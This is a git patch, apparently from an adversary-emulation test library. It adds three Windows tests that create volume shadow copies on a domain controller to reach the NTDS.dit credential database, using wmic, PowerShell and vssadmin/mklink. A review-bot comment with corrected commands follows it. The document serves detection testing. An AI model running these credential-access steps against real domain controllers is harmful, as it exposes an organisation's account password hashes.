From f7efbc9d6a8ad01b63e687a32bf91086d299cd01 Mon Sep 17 00:00:00 2001
From: P4T12ICK
Date: Tue, 30 Jun 2020 16:34:07 +0200
Subject: [PATCH] new atomics (#1098)

Co-authored-by: Patrick Bareiss
---
 atomics/Indexes/Indexes-CSV/index.csv | 3 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +
 atomics/Indexes/Indexes-Markdown/index.md | 3 +
 .../Indexes/Indexes-Markdown/windows-index.md | 3 +
 atomics/Indexes/index.yaml | 79 +++++++++++-
 atomics/T1003.003/T1003.003.md | 115 +++++++++++++++++-
 atomics/T1003.003/T1003.003.yaml | 71 ++++++++++-
 7 files changed, 269 insertions(+), 8 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cebadf37..e4f467af 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -176,6 +176,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 73cc639d..5d64bb8f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -408,6 +408,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Packet Capture PowerShell,2bf62970-013a-4c74-b0a8-64030874e89a,powershell
 credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f844b414..7a372883 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -390,6 +390,9 @@
 - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
 - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
 - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
 - Atomic Test #1: Packet Capture Linux [linux]
 - Atomic Test #2: Packet Capture macOS [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6c42e8a4..233977fd 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -845,6 +845,9 @@
 - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
 - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
 - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
 - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
 - Atomic Test #4: Packet Capture PowerShell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2b744d57..3e0b7db6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18176,12 +18176,14 @@ credential-access: elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - description: "This test is intended to be run on a domain Controller.\n\nThe - Active Directory database NTDS.dit may be dumped by copying it from a Volume - Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume - Shadow Copy with NTDS.dit\".\nA successful test also requires the export of - the SYSTEM Registry hive. \nThis test must be executed on a Windows Domain - Controller.\n" + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + + This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". + A successful test also requires the export of the SYSTEM Registry hive. + This test must be executed on a Windows Domain Controller. supported_platforms: - windows input_arguments: 
@@ -18249,6 +18251,71 @@ credential-access: ' name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with WMI + auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + dependencies: + - description: Target must be a Domain Controller + prereq_command: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v + ProductType | findstr LanmanNT + get_prereq_command: echo Sorry, Promoting this machine to a Domain Controller + must be done manually + executor: + command: 'wmic shadowcopy call create Volume=#{drive_letter} + +' + name: command_prompt + elevation_required: true + - name: Create Volume Shadow Copy with Powershell + auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + executor: + command: "(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')\n" + name: powershell + elevation_required: true + - name: Create Symlink to Volume Shadow Copy + auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. 
+ supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + symlink_path: + description: symlink path + type: String + default: C:\Temp\vssstore + executor: + command: | + vssadmin.exe create shadow /for=#{drive_letter} + mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 + name: command_prompt + elevation_required: true T1040: technique: id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 5fe7fcc8..b46716a0 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th - [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil) +- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi) + +- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell) + +- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy) +
@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". -A successful test also requires the export of the SYSTEM Registry hive. +A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. **Supported Platforms:** Windows @@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually +
+
+ +## Atomic Test #4 - Create Volume Shadow Copy with WMI +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +wmic shadowcopy call create Volume=#{drive_letter} +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Target must be a Domain Controller +##### Check Prereq Commands: +```cmd +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +``` +##### Get Prereq Commands: +```cmd +echo Sorry, Promoting this machine to a Domain Controller must be done manually +``` + + + + +
+
+ +## Atomic Test #5 - Create Volume Shadow Copy with Powershell +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible') +``` + + + + + + +
+
+ +## Atomic Test #6 - Create Symlink to Volume Shadow Copy +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| +| symlink_path | symlink path | String | C:\Temp\vssstore| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +vssadmin.exe create shadow /for=#{drive_letter} +mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 +``` + + + + + +
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 9718e758..6d7938e1 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -35,7 +35,7 @@ atomic_tests: The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". - A successful test also requires the export of the SYSTEM Registry hive. + A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. supported_platforms: - windows 
@@ -111,3 +111,72 @@ atomic_tests: rmdir /q /s #{output_folder} name: command_prompt elevation_required: true + +- name: Create Volume Shadow Copy with WMI + auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + dependencies: + - description: | + Target must be a Domain Controller + prereq_command: | + reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT + get_prereq_command: | + echo Sorry, Promoting this machine to a Domain Controller must be done manually + executor: + command: | + wmic shadowcopy call create Volume=#{drive_letter} + name: command_prompt + elevation_required: true + +- name: Create Volume Shadow Copy with Powershell + auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + executor: + command: | + (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible') + name: powershell + elevation_required: true + +- name: Create Symlink to Volume Shadow Copy + auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. 
+ supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + symlink_path: + description: symlink path + type: String + default: 'C:\Temp\vssstore' + executor: + command: | + vssadmin.exe create shadow /for=#{drive_letter} + mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 + name: command_prompt + elevation_required: true
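Review bot: The `mklink` line in "Create Symlink to Volume Shadow Copy" hard-codes `HarddiskVolumeShadowCopy1`, so on a host that already holds shadow copies (including ones left by the other three create-shadow tests, none of which has a `cleanup_command`) the copy just created gets a higher number and the symlink points at an older copy or at a device that no longer exists; the volume name should be read from the `vssadmin create shadow` output, and the symlink target presumably needs a trailing `\` to be traversable — worth confirming on a DC. In "Create Volume Shadow Copy with Powershell" the rendered call with the default input is `.Create(C:,'ClientAccessible')`; a bare `C:` inside a method argument is not valid PowerShell expression syntax, and the Win32_ShadowCopy.Create documentation shows the volume as `C:\`, so the argument should be quoted as `'#{drive_letter}\'`. Tests #5 and #6 also lack the Domain Controller `dependencies` block that test #4 carries, and test #6 has no prerequisite ensuring the parent of `C:\Temp\vssstore` exists before `mklink` runs. Removing the created copy afterwards needs care: `vssadmin delete shadows /for=... /quiet` would delete every shadow copy on that volume, so capturing the new copy's ID is the safer cleanup; whether the `for /f` variable below is written `%i` or `%%i` depends on whether the executor runs the line directly under `cmd /c` or through a batch file — confirm against the runner.

```yaml
- name: Create Volume Shadow Copy with Powershell
  # … unchanged: guid, description, platforms, drive_letter input …
  executor:
    command: |
      (gwmi -list win32_shadowcopy).Create('#{drive_letter}\','ClientAccessible')
    name: powershell
    elevation_required: true

- name: Create Symlink to Volume Shadow Copy
  # … unchanged: guid, description, platforms, inputs …
  executor:
    command: |
      for /f "tokens=5" %i in ('vssadmin.exe create shadow /for=#{drive_letter} ^| findstr /c:"Shadow Copy Volume Name"') do mklink /D #{symlink_path} %i\
    cleanup_command: |
      rmdir #{symlink_path}
    name: command_prompt
    elevation_required: true
```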